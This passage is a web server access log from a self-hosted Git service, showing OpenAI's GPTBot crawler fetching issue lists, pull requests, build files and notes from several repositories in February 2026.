"/windpacer/homepage/issues?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?state=all&type=all" [Client 74.7.227.38] [Length 9919] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:18:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72035] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118641] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27894] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:18:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:18:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2fusdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20842] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:18:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2fkrx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20841] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:18:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" +[17/Feb/2026:18:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2fNuget%ec%97%90%20OPC%20UA%20%eb%9d%bc%ec%9d%b4%eb%b8%8c%eb%9f%ac%eb%a6%ac%ec%84%a4%ec%b9%98.md" [Client 74.7.227.38] [Length 23723] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:18:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:18:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:18:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11912] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11373] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:18:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71218] [Gzip 17.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 37064] [Gzip 14.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:17:59 +0000] - 200 200 - GET https 